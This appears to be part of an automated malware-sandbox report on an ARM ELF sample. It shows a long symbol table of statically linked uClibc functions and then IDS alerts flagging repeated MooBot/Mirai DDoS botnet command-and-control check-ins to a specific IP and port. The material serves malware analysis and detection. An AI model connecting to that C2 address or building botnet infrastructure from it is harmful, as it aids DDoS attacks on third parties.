                                                  __GI_stat.symtab0x12fa8100FUNC<unknown>HIDDEN2
                                                  __GI_strchr.symtab0x1bce4240FUNC<unknown>HIDDEN2
                                                  __GI_strchrnul.symtab0x1bdd4236FUNC<unknown>HIDDEN2
                                                  __GI_strcmp.symtab0x15dd028FUNC<unknown>HIDDEN2
                                                  __GI_strcoll.symtab0x15dd028FUNC<unknown>HIDDEN2
                                                  __GI_strcpy.symtab0x15e5036FUNC<unknown>HIDDEN2
                                                  __GI_strcspn.symtab0x1bec068FUNC<unknown>HIDDEN2
                                                  __GI_strlen.symtab0x15df096FUNC<unknown>HIDDEN2
                                                  __GI_strnlen.symtab0x15e74204FUNC<unknown>HIDDEN2
                                                  __GI_strpbrk.symtab0x1bfc864FUNC<unknown>HIDDEN2
                                                  __GI_strrchr.symtab0x15f4080FUNC<unknown>HIDDEN2
                                                  __GI_strspn.symtab0x1bf0476FUNC<unknown>HIDDEN2
                                                  __GI_strstr.symtab0x15f90252FUNC<unknown>HIDDEN2
                                                  __GI_strtok.symtab0x161b048FUNC<unknown>HIDDEN2
                                                  __GI_strtok_r.symtab0x1bf50120FUNC<unknown>HIDDEN2
                                                  __GI_strtol.symtab0x183bc28FUNC<unknown>HIDDEN2
                                                  __GI_sysconf.symtab0x187c01572FUNC<unknown>HIDDEN2
                                                  __GI_tcgetattr.symtab0x16204124FUNC<unknown>HIDDEN2
                                                  __GI_time.symtab0x1304c48FUNC<unknown>HIDDEN2
                                                  __GI_times.symtab0x1a0e020FUNC<unknown>HIDDEN2
                                                  __GI_unlink.symtab0x1307c64FUNC<unknown>HIDDEN2
                                                  __GI_vfprintf.symtab0x142ac324FUNC<unknown>HIDDEN2
                                                  __GI_vsnprintf.symtab0x13b68208FUNC<unknown>HIDDEN2
                                                  __GI_wait4.symtab0x1a0f456FUNC<unknown>HIDDEN2
                                                  __GI_waitpid.symtab0x130bc124FUNC<unknown>HIDDEN2
                                                  __GI_wcrtomb.symtab0x1a5bc84FUNC<unknown>HIDDEN2
                                                  __GI_wcsnrtombs.symtab0x1a634188FUNC<unknown>HIDDEN2
                                                  __GI_wcsrtombs.symtab0x1a61036FUNC<unknown>HIDDEN2
                                                  __GI_write.symtab0x19470100FUNC<unknown>HIDDEN2
                                                  __JCR_END__.symtab0x2786c0OBJECT<unknown>DEFAULT11
                                                  __JCR_LIST__.symtab0x2786c0OBJECT<unknown>DEFAULT11
                                                  ___Unwind_ForcedUnwind.symtab0x120e836FUNC<unknown>HIDDEN2
                                                  ___Unwind_RaiseException.symtab0x1207c36FUNC<unknown>HIDDEN2
                                                  ___Unwind_Resume.symtab0x120a036FUNC<unknown>HIDDEN2
                                                  ___Unwind_Resume_or_Rethrow.symtab0x120c436FUNC<unknown>HIDDEN2
                                                  __adddf3.symtab0x1cbfc784FUNC<unknown>HIDDEN2
                                                  __aeabi_cdcmpeq.symtab0x1d55824FUNC<unknown>HIDDEN2
                                                  __aeabi_cdcmple.symtab0x1d55824FUNC<unknown>HIDDEN2
                                                  __aeabi_cdrcmple.symtab0x1d53c52FUNC<unknown>HIDDEN2
                                                  __aeabi_d2uiz.symtab0x1d5e884FUNC<unknown>HIDDEN2
                                                  __aeabi_dadd.symtab0x1cbfc784FUNC<unknown>HIDDEN2
                                                  __aeabi_dcmpeq.symtab0x1d57024FUNC<unknown>HIDDEN2
                                                  __aeabi_dcmpge.symtab0x1d5b824FUNC<unknown>HIDDEN2
                                                  __aeabi_dcmpgt.symtab0x1d5d024FUNC<unknown>HIDDEN2
                                                  __aeabi_dcmple.symtab0x1d5a024FUNC<unknown>HIDDEN2
                                                  __aeabi_dcmplt.symtab0x1d58824FUNC<unknown>HIDDEN2
                                                  __aeabi_ddiv.symtab0x1d29c524FUNC<unknown>HIDDEN2
                                                  __aeabi_dmul.symtab0x1d00c656FUNC<unknown>HIDDEN2
                                                  __aeabi_drsub.symtab0x1cbf00FUNC<unknown>HIDDEN2
                                                  __aeabi_dsub.symtab0x1cbf8788FUNC<unknown>HIDDEN2
                                                  __aeabi_f2d.symtab0x1cf5864FUNC<unknown>HIDDEN2
                                                  __aeabi_i2d.symtab0x1cf3040FUNC<unknown>HIDDEN2
                                                  __aeabi_idiv.symtab0x1123c0FUNC<unknown>HIDDEN2
                                                  __aeabi_idivmod.symtab0x1136824FUNC<unknown>HIDDEN2
                                                  __aeabi_l2d.symtab0x1cfac96FUNC<unknown>HIDDEN2
                                                  __aeabi_read_tp.symtab0x103608FUNC<unknown>HIDDEN2
                                                  __aeabi_ui2d.symtab0x1cf0c36FUNC<unknown>HIDDEN2
                                                  __aeabi_uidiv.symtab0x111280FUNC<unknown>HIDDEN2
                                                  __aeabi_uidivmod.symtab0x1122424FUNC<unknown>HIDDEN2
                                                  __aeabi_ul2d.symtab0x1cf98116FUNC<unknown>HIDDEN2
                                                  __aeabi_unwind_cpp_pr0.symtab0x120488FUNC<unknown>HIDDEN2
                                                  __aeabi_unwind_cpp_pr1.symtab0x120408FUNC<unknown>HIDDEN2
                                                  __aeabi_unwind_cpp_pr2.symtab0x120388FUNC<unknown>HIDDEN2
                                                  __app_fini.symtab0x2e2204OBJECT<unknown>HIDDEN14
                                                  __atexit_lock.symtab0x27bc824OBJECT<unknown>DEFAULT13
                                                  __bss_end__.symtab0x2ed100NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __bss_start.symtab0x27bf40NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __bss_start__.symtab0x27bf40NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __check_one_fd.symtab0x1979484FUNC<unknown>DEFAULT2
                                                  __close.symtab0x19350100FUNC<unknown>DEFAULT2
                                                  __close_nocancel.symtab0x1933424FUNC<unknown>DEFAULT2
                                                  __cmpdf2.symtab0x1d4b8132FUNC<unknown>HIDDEN2
                                                  __ctype_b.symtab0x27bf04OBJECT<unknown>DEFAULT13
                                                  __curbrk.symtab0x2e7644OBJECT<unknown>HIDDEN14
                                                  __cxa_begin_cleanup.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __cxa_call_unexpected.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __cxa_type_match.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __data_start.symtab0x2791c0NOTYPE<unknown>DEFAULT13
                                                  __default_rt_sa_restorer.symtab0x129780FUNC<unknown>DEFAULT2
                                                  __default_sa_restorer.symtab0x1296c0FUNC<unknown>DEFAULT2
                                                  __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __div0.symtab0x1138020FUNC<unknown>HIDDEN2
                                                  __divdf3.symtab0x1d29c524FUNC<unknown>HIDDEN2
                                                  __divsi3.symtab0x1123c300FUNC<unknown>HIDDEN2
                                                  __do_global_dtors_aux.symtab0x80f00FUNC<unknown>DEFAULT2
                                                  __do_global_dtors_aux_fini_array_entry.symtab0x278680OBJECT<unknown>DEFAULT10
                                                  __end__.symtab0x2ed100NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __environ.symtab0x2e2184OBJECT<unknown>DEFAULT14
                                                  __eqdf2.symtab0x1d4b8132FUNC<unknown>HIDDEN2
                                                  __errno_location.symtab0x103bc32FUNC<unknown>DEFAULT2
                                                  __exidx_end.symtab0x1f8600NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __exidx_start.symtab0x1f6f00NOTYPE<unknown>DEFAULTSHN_ABS
                                                  __exit_cleanup.symtab0x2dcc84OBJECT<unknown>HIDDEN14
                                                  __extendsfdf2.symtab0x1cf5864FUNC<unknown>HIDDEN2
                                                  __fcntl_nocancel.symtab0x12980152FUNC<unknown>DEFAULT2
                                                  __fgetc_unlocked.symtab0x1b51c300FUNC<unknown>DEFAULT2
                                                  __fini_array_end.symtab0x2786c0NOTYPE<unknown>HIDDEN10
                                                  __fini_array_start.symtab0x278680NOTYPE<unknown>HIDDEN10
                                                  __fixunsdfsi.symtab0x1d5e884FUNC<unknown>HIDDEN2
                                                  __floatdidf.symtab0x1cfac96FUNC<unknown>HIDDEN2
                                                  __floatsidf.symtab0x1cf3040FUNC<unknown>HIDDEN2
                                                  __floatundidf.symtab0x1cf98116FUNC<unknown>HIDDEN2
                                                  __floatunsidf.symtab0x1cf0c36FUNC<unknown>HIDDEN2
                                                  __fork.symtab0x1023824FUNC<unknown>DEFAULT2
                                                  __fork_generation_pointer.symtab0x2ecdc4OBJECT<unknown>HIDDEN14
                                                  __fork_handlers.symtab0x2ece04OBJECT<unknown>HIDDEN14
                                                  __fork_lock.symtab0x2dccc4OBJECT<unknown>HIDDEN14
                                                  __frame_dummy_init_array_entry.symtab0x278640OBJECT<unknown>DEFAULT9
                                                  __gedf2.symtab0x1d4a8148FUNC<unknown>HIDDEN2
                                                  __getdents.symtab0x19d54160FUNC<unknown>HIDDEN2
                                                  __getdents64.symtab0x1c534328FUNC<unknown>HIDDEN2
                                                  __getpagesize.symtab0x19e5c40FUNC<unknown>DEFAULT2
                                                  __getpid.symtab0x191b072FUNC<unknown>DEFAULT2
                                                  __glibc_strerror_r.symtab0x1608c24FUNC<unknown>DEFAULT2
                                                  __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  __gnu_Unwind_Find_exidx.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __gnu_Unwind_ForcedUnwind.symtab0x117ec28FUNC<unknown>HIDDEN2
                                                  __gnu_Unwind_RaiseException.symtab0x118d4184FUNC<unknown>HIDDEN2
                                                  __gnu_Unwind_Restore_VFP.symtab0x1206c0FUNC<unknown>HIDDEN2
                                                  __gnu_Unwind_Resume.symtab0x11868108FUNC<unknown>HIDDEN2
                                                  __gnu_Unwind_Resume_or_Rethrow.symtab0x1198c32FUNC<unknown>HIDDEN2
                                                  __gnu_Unwind_Save_VFP.symtab0x120740FUNC<unknown>HIDDEN2
                                                  __gnu_unwind_execute.symtab0x121501812FUNC<unknown>HIDDEN2
                                                  __gnu_unwind_frame.symtab0x1286472FUNC<unknown>HIDDEN2
                                                  __gnu_unwind_pr_common.symtab0x11af01352FUNC<unknown>DEFAULT2
                                                  __gtdf2.symtab0x1d4a8148FUNC<unknown>HIDDEN2
                                                  __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __init_array_end.symtab0x278680NOTYPE<unknown>HIDDEN9
                                                  __init_array_start.symtab0x278640NOTYPE<unknown>HIDDEN9
                                                  __is_smp.symtab0x2e90c4OBJECT<unknown>HIDDEN14
                                                  __ledf2.symtab0x1d4b0140FUNC<unknown>HIDDEN2
                                                  __libc_accept.symtab0x162ec116FUNC<unknown>DEFAULT2
                                                  __libc_close.symtab0x19350100FUNC<unknown>DEFAULT2
                                                  __libc_connect.symtab0x163e8116FUNC<unknown>DEFAULT2
                                                  __libc_disable_asynccancel.symtab0x19570136FUNC<unknown>HIDDEN2
                                                  __libc_enable_asynccancel.symtab0x195f8220FUNC<unknown>HIDDEN2
                                                  __libc_errno.symtab0x04TLS<unknown>HIDDEN8
                                                  __libc_fcntl.symtab0x12a18244FUNC<unknown>DEFAULT2
                                                  __libc_fork.symtab0x18de4972FUNC<unknown>DEFAULT2
                                                  __libc_h_errno.symtab0x44TLS<unknown>HIDDEN8
                                                  __libc_longjmp.symtab0x12c8056FUNC<unknown>DEFAULT2
                                                  __libc_multiple_threads.symtab0x2ece44OBJECT<unknown>HIDDEN14
                                                  __libc_nanosleep.symtab0x12cf896FUNC<unknown>DEFAULT2
                                                  __libc_open.symtab0x193e0100FUNC<unknown>DEFAULT2
                                                  __libc_read.symtab0x19500100FUNC<unknown>DEFAULT2
                                                  __libc_recv.symtab0x1656c112FUNC<unknown>DEFAULT2
                                                  __libc_recvfrom.symtab0x16624136FUNC<unknown>DEFAULT2
                                                  __libc_select.symtab0x12e58132FUNC<unknown>DEFAULT2
                                                  __libc_send.symtab0x166f0112FUNC<unknown>DEFAULT2
                                                  __libc_sendto.symtab0x167ac136FUNC<unknown>DEFAULT2
                                                  __libc_setup_tls.symtab0x1c204560FUNC<unknown>DEFAULT2
                                                  __libc_sigaction.symtab0x128e0136FUNC<unknown>DEFAULT2
                                                  __libc_siglongjmp.symtab0x12c8056FUNC<unknown>DEFAULT2
                                                  __libc_stack_end.symtab0x2e2144OBJECT<unknown>DEFAULT14
                                                  __libc_system.symtab0x10a7c132FUNC<unknown>DEFAULT2
                                                  __libc_waitpid.symtab0x130bc124FUNC<unknown>DEFAULT2
                                                  __libc_write.symtab0x19470100FUNC<unknown>DEFAULT2
                                                  __lll_lock_wait.symtab0x10d2c156FUNC<unknown>HIDDEN2
                                                  __lll_lock_wait_private.symtab0x10c94152FUNC<unknown>HIDDEN2
                                                  __lll_timedlock_wait.symtab0x10ea0304FUNC<unknown>HIDDEN2
                                                  __lll_timedwait_tid.symtab0x10dc8216FUNC<unknown>HIDDEN2
                                                  __longjmp.symtab0x19cd420FUNC<unknown>DEFAULT2
                                                  __ltdf2.symtab0x1d4b0140FUNC<unknown>HIDDEN2
                                                  __malloc_consolidate.symtab0x17820436FUNC<unknown>HIDDEN2
                                                  __malloc_largebin_index.symtab0x168c0120FUNC<unknown>DEFAULT2
                                                  __malloc_lock.symtab0x27aec24OBJECT<unknown>DEFAULT13
                                                  __malloc_state.symtab0x2e964888OBJECT<unknown>DEFAULT14
                                                  __malloc_trim.symtab0x17770176FUNC<unknown>DEFAULT2
                                                  __muldf3.symtab0x1d00c656FUNC<unknown>HIDDEN2
                                                  __nedf2.symtab0x1d4b8132FUNC<unknown>HIDDEN2
                                                  __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __open.symtab0x193e0100FUNC<unknown>DEFAULT2
                                                  __open_nocancel.symtab0x193c424FUNC<unknown>DEFAULT2
                                                  __pagesize.symtab0x2e21c4OBJECT<unknown>DEFAULT14
                                                  __preinit_array_end.symtab0x278640NOTYPE<unknown>HIDDEN8
                                                  __preinit_array_start.symtab0x278640NOTYPE<unknown>HIDDEN8
                                                  __progname.symtab0x27be44OBJECT<unknown>DEFAULT13
                                                  __progname_full.symtab0x27be84OBJECT<unknown>DEFAULT13
                                                  __pthread_disable_asynccancel.symtab0x10fd8136FUNC<unknown>HIDDEN2
                                                  __pthread_enable_asynccancel.symtab0x11060200FUNC<unknown>HIDDEN2
                                                  __pthread_initialize_minimal.symtab0x1c43412FUNC<unknown>DEFAULT2
                                                  __pthread_multiple_threads.symtab0x2e9104OBJECT<unknown>HIDDEN14
                                                  __pthread_mutex_init.symtab0x196dc8FUNC<unknown>DEFAULT2
                                                  __pthread_mutex_lock.symtab0x196d48FUNC<unknown>DEFAULT2
                                                  __pthread_mutex_trylock.symtab0x196d48FUNC<unknown>DEFAULT2
                                                  __pthread_mutex_unlock.symtab0x196d48FUNC<unknown>DEFAULT2
                                                  __pthread_return_0.symtab0x196d48FUNC<unknown>DEFAULT2
                                                  __pthread_unwind.symtab0x10b0484FUNC<unknown>DEFAULT2
                                                  __pthread_unwind_next.symtab0x10b5816FUNC<unknown>DEFAULT2
                                                  __read.symtab0x19500100FUNC<unknown>DEFAULT2
                                                  __read_nocancel.symtab0x194e424FUNC<unknown>DEFAULT2
                                                  __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                  __restore_core_regs.symtab0x1205028FUNC<unknown>HIDDEN2
                                                  __rtld_fini.symtab0x2e2244OBJECT<unknown>HIDDEN14
                                                  __sigaction.symtab0x1037076FUNC<unknown>DEFAULT2
                                                  __sigjmp_save.symtab0x1cb4064FUNC<unknown>HIDDEN2
                                                  __sigsetjmp.symtab0x1c52812FUNC<unknown>DEFAULT2
                                                  __stdin.symtab0x27a104OBJECT<unknown>DEFAULT13
                                                  __stdio_READ.symtab0x1c86088FUNC<unknown>HIDDEN2
                                                  __stdio_WRITE.symtab0x1a6f0220FUNC<unknown>HIDDEN2
                                                  __stdio_adjust_position.symtab0x1c8b8200FUNC<unknown>HIDDEN2
                                                  __stdio_fwrite.symtab0x1a7cc320FUNC<unknown>HIDDEN2
                                                  __stdio_rfill.symtab0x1c98048FUNC<unknown>HIDDEN2
                                                  __stdio_seek.symtab0x1ca5460FUNC<unknown>HIDDEN2
                                                  __stdio_trans2r_o.symtab0x1c9b0164FUNC<unknown>HIDDEN2
                                                  __stdio_trans2w_o.symtab0x1a90c220FUNC<unknown>HIDDEN2
                                                  __stdio_wcommit.symtab0x1427c48FUNC<unknown>HIDDEN2
                                                  __stdout.symtab0x27a144OBJECT<unknown>DEFAULT13
                                                  __subdf3.symtab0x1cbf8788FUNC<unknown>HIDDEN2
                                                  __sys_accept.symtab0x162a868FUNC<unknown>DEFAULT2
                                                  __sys_connect.symtab0x163a468FUNC<unknown>DEFAULT2
                                                  __sys_recv.symtab0x1652868FUNC<unknown>DEFAULT2
                                                  __sys_recvfrom.symtab0x165dc72FUNC<unknown>DEFAULT2
                                                  __sys_send.symtab0x166ac68FUNC<unknown>DEFAULT2
                                                  __sys_sendto.symtab0x1676076FUNC<unknown>DEFAULT2
                                                  __syscall_error.symtab0x19ca844FUNC<unknown>HIDDEN2
                                                  __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  __syscall_nanosleep.symtab0x12cb864FUNC<unknown>DEFAULT2
                                                  __syscall_rt_sigaction.symtab0x12b0c64FUNC<unknown>DEFAULT2
                                                  __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  __syscall_select.symtab0x12e1468FUNC<unknown>DEFAULT2
                                                  __tls_get_addr.symtab0x1c1e036FUNC<unknown>DEFAULT2
                                                  __uClibc_fini.symtab0x19718124FUNC<unknown>DEFAULT2
                                                  __uClibc_init.symtab0x197e888FUNC<unknown>DEFAULT2
                                                  __uClibc_main.symtab0x198401004FUNC<unknown>DEFAULT2
                                                  __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  __uclibc_progname.symtab0x27be04OBJECT<unknown>HIDDEN13
                                                  __udivsi3.symtab0x11128252FUNC<unknown>HIDDEN2
                                                  __write.symtab0x19470100FUNC<unknown>DEFAULT2
                                                  __write_nocancel.symtab0x1945424FUNC<unknown>DEFAULT2
                                                  __xpg_strerror_r.symtab0x160a4268FUNC<unknown>DEFAULT2
                                                  __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  __xstat32_conv.symtab0x13204172FUNC<unknown>HIDDEN2
                                                  __xstat64_conv.symtab0x13138204FUNC<unknown>HIDDEN2
                                                  _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _bss_custom_printf_spec.symtab0x2dcb410OBJECT<unknown>DEFAULT14
                                                  _bss_end__.symtab0x2ed100NOTYPE<unknown>DEFAULTSHN_ABS
                                                  _charpad.symtab0x143f084FUNC<unknown>DEFAULT2
                                                  _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _custom_printf_arginfo.symtab0x2e91440OBJECT<unknown>HIDDEN14
                                                  _custom_printf_handler.symtab0x2e93c40OBJECT<unknown>HIDDEN14
                                                  _custom_printf_spec.symtab0x27ae84OBJECT<unknown>HIDDEN13
                                                  _dl_aux_init.symtab0x1c44056FUNC<unknown>DEFAULT2
                                                  _dl_nothread_init_static_tls.symtab0x1c47888FUNC<unknown>HIDDEN2
                                                  _dl_phdr.symtab0x2ed084OBJECT<unknown>DEFAULT14
                                                  _dl_phnum.symtab0x2ed0c4OBJECT<unknown>DEFAULT14
                                                  _dl_tls_dtv_gaps.symtab0x2ecfc1OBJECT<unknown>DEFAULT14
                                                  _dl_tls_dtv_slotinfo_list.symtab0x2ecf84OBJECT<unknown>DEFAULT14
                                                  _dl_tls_generation.symtab0x2ed004OBJECT<unknown>DEFAULT14
                                                  _dl_tls_max_dtv_idx.symtab0x2ecf04OBJECT<unknown>DEFAULT14
                                                  _dl_tls_setup.symtab0x1c178104FUNC<unknown>DEFAULT2
                                                  _dl_tls_static_align.symtab0x2ecec4OBJECT<unknown>DEFAULT14
                                                  _dl_tls_static_nelem.symtab0x2ed044OBJECT<unknown>DEFAULT14
                                                  _dl_tls_static_size.symtab0x2ecf44OBJECT<unknown>DEFAULT14
                                                  _dl_tls_static_used.symtab0x2ece84OBJECT<unknown>DEFAULT14
                                                  _edata.symtab0x27bf40NOTYPE<unknown>DEFAULTSHN_ABS
                                                  _end.symtab0x2ed100NOTYPE<unknown>DEFAULTSHN_ABS
                                                  _exit.symtab0x12b4c104FUNC<unknown>DEFAULT2
                                                  _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _fini.symtab0x1d63c0FUNC<unknown>DEFAULT3
                                                  _fixed_buffers.symtab0x2bcb48192OBJECT<unknown>DEFAULT14
                                                  _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _fp_out_narrow.symtab0x14444132FUNC<unknown>DEFAULT2
                                                  _fpmaxtostr.symtab0x1abe42036FUNC<unknown>HIDDEN2
                                                  _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _init.symtab0x80d40FUNC<unknown>DEFAULT1
                                                  _load_inttype.symtab0x1a9e8116FUNC<unknown>HIDDEN2
                                                  _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _longjmp.symtab0x12c8056FUNC<unknown>DEFAULT2
                                                  _longjmp_unwind.symtab0x192e860FUNC<unknown>DEFAULT2
                                                  _memcpy.symtab0x1b6500FUNC<unknown>HIDDEN2
                                                  _ppfs_init.symtab0x14bbc160FUNC<unknown>HIDDEN2
                                                  _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _ppfs_parsespec.symtab0x14ea41392FUNC<unknown>HIDDEN2
                                                  _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _ppfs_prepargs.symtab0x14c5c68FUNC<unknown>HIDDEN2
                                                  _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _ppfs_setargs.symtab0x14ca0432FUNC<unknown>HIDDEN2
                                                  _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _promoted_size.symtab0x14e5084FUNC<unknown>DEFAULT2
                                                  _pthread_cleanup_pop_restore.symtab0x196ec44FUNC<unknown>DEFAULT2
                                                  _pthread_cleanup_push_defer.symtab0x196e48FUNC<unknown>DEFAULT2
                                                  _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _setjmp.symtab0x19ce88FUNC<unknown>DEFAULT2
                                                  _start.symtab0x81940FUNC<unknown>DEFAULT2
                                                  _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _stdio_fopen.symtab0x13c381120FUNC<unknown>HIDDEN2
                                                  _stdio_init.symtab0x14098128FUNC<unknown>HIDDEN2
                                                  _stdio_openlist.symtab0x27a184OBJECT<unknown>DEFAULT13
                                                  _stdio_openlist_add_lock.symtab0x2bc9412OBJECT<unknown>DEFAULT14
                                                  _stdio_openlist_dec_use.symtab0x15530688FUNC<unknown>HIDDEN2
                                                  _stdio_openlist_del_count.symtab0x2bcb04OBJECT<unknown>DEFAULT14
                                                  _stdio_openlist_del_lock.symtab0x2bca012OBJECT<unknown>DEFAULT14
                                                  _stdio_openlist_use_count.symtab0x2bcac4OBJECT<unknown>DEFAULT14
                                                  _stdio_streams.symtab0x27a1c204OBJECT<unknown>DEFAULT13
                                                  _stdio_term.symtab0x14118356FUNC<unknown>HIDDEN2
                                                  _stdio_user_locking.symtab0x27a004OBJECT<unknown>DEFAULT13
                                                  _stdlib_strto_l.symtab0x183d8472FUNC<unknown>HIDDEN2
                                                  _stdlib_strto_l.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _store_inttype.symtab0x1aa5c44FUNC<unknown>HIDDEN2
                                                  _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _string_syserrmsgs.symtab0x1e78c2906OBJECT<unknown>HIDDEN4
                                                  _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _uintmaxtostr.symtab0x1aa88348FUNC<unknown>HIDDEN2
                                                  _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _vfprintf_internal.symtab0x144c81780FUNC<unknown>HIDDEN2
                                                  _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  abort.symtab0x17c50296FUNC<unknown>DEFAULT2
                                                  abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2024-10-07T16:23:06.006561+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235656091.200.103.11723561TCP
                                                  2024-10-07T16:23:15.603354+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235656291.200.103.11723561TCP
                                                  2024-10-07T16:23:26.246511+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235656491.200.103.11723561TCP
                                                  2024-10-07T16:23:28.899113+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235656691.200.103.11723561TCP
                                                  2024-10-07T16:23:33.615423+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235656891.200.103.11723561TCP
                                                  2024-10-07T16:23:44.353616+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235657091.200.103.11723561TCP
                                                  2024-10-07T16:23:52.077181+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235657291.200.103.11723561TCP
                                                  2024-10-07T16:24:00.708676+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235657491.200.103.11723561TCP
                                                  2024-10-07T16:24:03.353037+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235657691.200.103.11723561TCP
                                                  2024-10-07T16:24:08.992696+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235657891.200.103.11723561TCP
                                                  2024-10-07T16:24:19.616536+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235658091.200.103.11723561TCP
                                                  2024-10-07T16:24:25.754809+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235658291.200.103.11723561TCP
                                                  2024-10-07T16:24:28.387054+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235658491.200.103.11723561TCP
                                                  2024-10-07T16:24:39.028066+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235658691.200.103.11723561TCP
                                                  2024-10-07T16:24:50.688280+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235658891.200.103.11723561TCP
                                                  2024-10-07T16:24:58.320979+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235659091.200.103.11723561TCP
                                                  2024-10-07T16:25:09.009078+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235659291.200.103.11723561TCP
                                                  2024-10-07T16:25:14.679682+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235659491.200.103.11723561TCP
                                                  2024-10-07T16:25:17.306127+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235659691.200.103.11723561TCP
                                                  2024-10-07T16:25:21.964504+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235659891.200.103.11723561TCP
                                                  2024-10-07T16:25:32.586940+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235660091.200.103.11723561TCP
                                                  2024-10-07T16:25:38.215037+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235660291.200.103.11723561TCP
                                                  2024-10-07T16:25:44.071976+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235660491.200.103.11723561TCP
                                                  2024-10-07T16:25:51.092735+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.235660691.200.103.11723561TCP
